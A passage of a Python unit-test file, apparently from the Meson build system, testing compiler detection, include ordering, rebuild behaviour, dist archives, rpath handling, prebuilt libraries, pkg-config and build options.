self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows():
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildAppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildLinuxDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
            env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
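            # LDFLAGS must not leak into preprocessor checks: if it did, the
            # project would see MESON_FAIL_VALUE and the configure step would fail.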
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertRebuiltTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertRebuiltTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def dist_impl(self, vcs_init):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
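            # `meson dist` produces only the .tar.xz (plus checksum) by default;
            # the zip archive has to be requested explicitly with --formats.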
vcs_init(project_dir)
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
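        # Depending on the compiler the define may use -D or /D syntax, and the
        # compilation database may or may not quote arguments, so accept all
        # four spellings as long as the defines are not duplicated.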
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
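        # Compile a single source file straight to an object file with the
        # detected compiler, bypassing Meson, so tests can supply prebuilt
        # objects and libraries to a later Meson build.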
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
        # Build the archive command from the detected static linker so the
        # right tool (ar, lib.exe, ...) and flags are used for this platform.
        link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
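        # Link a shared library directly with the compiler driver (or the MSVC
        # linker) so tests can exercise Meson against a prebuilt .so/.dll.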
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
        Test that we prefer static libraries when `static: true` is
        passed to dependency() with pkg-config. Can't be an ordinary test
        because we need to build libs and try to find them from meson.build.
        Also test that it's not a hard error to have unsatisfiable library deps,
        since system libraries such as -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
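        # The prefix deliberately contains a space so the generated pkg-config
        # file must quote/escape its paths correctly.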
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main() {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
